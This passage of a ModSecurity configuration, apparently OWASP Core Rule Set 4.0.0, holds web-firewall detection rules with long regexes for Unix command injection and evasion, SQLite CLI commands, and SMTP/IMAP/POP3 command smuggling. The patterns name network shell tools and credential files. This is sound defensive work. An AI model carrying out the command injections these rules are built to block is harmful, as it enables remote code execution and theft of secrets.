*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dt]|[g-hu]|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cr]|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l|[co][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ex]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|l)|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|c)|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|z)|y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h))" \ + "id:932220,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection with pipe',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ Rule 932240 ]=- +# +# Generic RCE Bypass blocking using different techniques: see https://github.com/coreruleset/coreruleset/issues/2632 +# +# This rule complements rule 932230 with generic evasion detection. +# Anything that uses a well-known evasion technique should be blocked at this level. +# The chained rule will exclude false positives due to german thousands separators (e.g., 10'000). +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932240.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932240 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?i)[\-0-9_a-z]+(?:[\s\v]*[\"'][^\s\v\"']+[\"']|(?:[\"'][\"']+|[\[-\]]+|\$+[!#\*\-0-9\?-@\x5c_a-\{]+|``|[\$<>]\(\))[\s\v]*)[\-0-9_a-z]+" \ + "id:932240,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection evasion attempt detected',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932240_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.932240_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \ + "t:none,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + + +# [ Sqlite System Command Execution ] +# +# This rule prevents execution of SQLite CLI commands like .system and .shell +# +# You can find a vulnerable script and a sample payload here: +# https://github.com/qxxxb/ctf/tree/master/2021/zer0pts_ctf/baby_sqli +# +# List of sqlite3 CLI commands: +# https://sqlite.org/cli.html +# +# Regular expression generated from regex-assembly/932210.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932210 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ;[\s\v]*\.[\s\v]*[\"']?(?:a(?:rchive|uth)|b(?:a(?:ckup|il)|inary)|c(?:d|h(?:anges|eck)|lone|onnection)|d(?:atabases|b(?:config|info)|ump)|e(?:cho|qp|x(?:cel|it|p(?:ert|lain)))|f(?:ilectrl|ullschema)|he(?:aders|lp)|i(?:mpo(?:rt|ster)|ndexes|otrace)|l(?:i(?:mi|n)t|o(?:ad|g))|(?:mod|n(?:onc|ullvalu)|unmodul)e|o(?:nce|pen|utput)|p(?:arameter|r(?:int|o(?:gress|mpt)))|quit|re(?:ad|cover|store)|s(?:ave|c(?:anstats|hema)|e(?:lftest|parator|ssion)|h(?:a3sum|ell|ow)?|tats|ystem)|t(?:ables|estc(?:ase|trl)|ime(?:out|r)|race)|vfs(?:info|list|name)|width)" \ + "id:932210,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,t:compressWhitespace,\ + msg:'Remote Command Execution: SQLite System Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ SMTP/IMAP/POP3 Command Execution ]=- +# +# Rationale +# ========= +# +# The rules for email command execution are based on the RFCs for each protocol. +# Some of the commands have optional and/or additional parameters, so we tried to be +# precise to avoid as many FP in PL2 rules. +# For those commands that resemble common English words, and may pose a higher risk of false positives, +# they have been split off to a sibling rule in PL3. + +# =[ SMTP Command Execution ]= +# +# This rule prevents execution of SMTP related system commands. +# +# List of SMTP commands: from rfc 5321 (https://www.rfc-editor.org/rfc/rfc5321) +# +# Regular expression generated from regex-assembly/932300.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932300 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:(?i:E)(?:HLO [\--\.A-Za-z\x17f\x212a]{1,255}|XPN .{1,64})|HELO [\--\.A-Za-z\x17f\x212a]{1,255}|MAIL FROM:<.{1,64}(?i:@).{1,255}(?i:>)|(?i:R)(?:CPT TO:(?:(?i:<).{1,64}(?i:@).{1,255}(?i:>)|(?i: ))?(?i:<).{1,64}(?i:>)|SET\b)|VRFY .{1,64}(?: <.{1,64}(?i:@).{1,255}(?i:>)|(?i:@).{1,255})|AUTH [\-0-9A-Z_a-z\x17f\x212a]{1,20}(?i: )(?:(?:[\+/-9A-Z_a-z\x17f\x212a]{4})*(?:[\+/-9A-Z_a-z\x17f\x212a]{2}(?i:=)|[\+/-9A-Z_a-z\x17f\x212a]{3}))?(?i:=)|STARTTLS\b|NOOP\b(?:(?i: ).{1,255})?)" \ + "id:932300,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: SMTP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# =[ IMAP Command Execution ]= +# +# This rule prevents execution of IMAP4 related system commands. +# +# List of IMAP4 commands: from rfc 3501 (https://datatracker.ietf.org/doc/html/rfc3501#section-9) +# +# Note: Mailbox International Naming Convention uses UTF-7, so it was left out explicitly. +# +# Regular expression generated from regex-assembly/932310.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932310 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n[0-9A-Z_a-z]{1,50}\b (?:A(?:PPEND (?:[\"-#%-&\*\--9A-Z\x5c_a-z]+)?(?: \([ \x5ca-z]+\))?(?: \"?[0-9]{1,2}-[0-9A-Z_a-z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [\+\-][0-9]{4}\"?)? \{[0-9]{1,20}\+?\}|UTHENTICATE [\-0-9_a-z]{1,20}\r\n)|L(?:SUB (?:[\"-#\*\.-9A-Z_a-z~]+)? (?:[\"%-&\*\.-9A-Z\x5c_a-z]+)?|ISTRIGHTS (?:[\"%-&\*\--9A-Z\x5c_a-z]+)?)|S(?:TATUS (?:[\"%-&\*\--9A-Z\x5c_a-z]+)? \((?:U(?:NSEEN|IDNEXT)|MESSAGES|UIDVALIDITY|RECENT| )+\)|ETACL (?:[\"%-&\*\--9A-Z\x5c_a-z]+)? [\+\-][ac-eik-lpr-tw-x]+?)|UID (?:COPY|FETCH|STORE) (?:[\*,0-:]+)?|(?:(?:DELETE|GET)ACL|MYRIGHTS) (?:[\"%-&\*\--9A-Z\x5c_a-z]+)?)" \ + "id:932310,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: IMAP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# =[ POP3 Command Execution ]= +# +# This rule prevents execution of POP3 related system commands. +# +# List of POP3 commands: +# - from rfc 1939 (https://www.rfc-editor.org/rfc/rfc1939#appendix-B) +# - extensions from rfc 2449 (https://www.rfc-editor.org/rfc/rfc2449) +# +# These commands all have some kind of parameter that makes them a good PL2 target. +# +# Regular expression generated from regex-assembly/932320.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932320 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n.*?\b(?:(?:LIST|TOP [0-9]+)(?: [0-9]+)?|U(?:SER .+?|IDL(?: [0-9]+)?)|PASS .+?|(?:RETR|DELE) [0-9]+?|A(?:POP [0-9A-Z_a-z]+ [0-9a-f]{32}|UTH [\-0-9A-Z_]{1,20} (?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=))" \ + "id:932320,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: POP3 Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Unix command injection ] +# +# This is a stricter sibling of rules 932230, 932235, 932250, 932260. +# This stricter sibling detects Unix RCE with and without prefix and words of any length. +# It uses the same regex. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932236.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932236 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible-playbook|tobm)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|an|io|ulimit)|s(?:h|plit|vtool)|u(?:(?:t|rl)[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:[\s\v&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\v&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\v&\)<>\|]|l(?:[\s\v&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|y(?:thon[^\s\v]|3?versions))|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:(?:facl)?[\s\v&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash|nap)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?: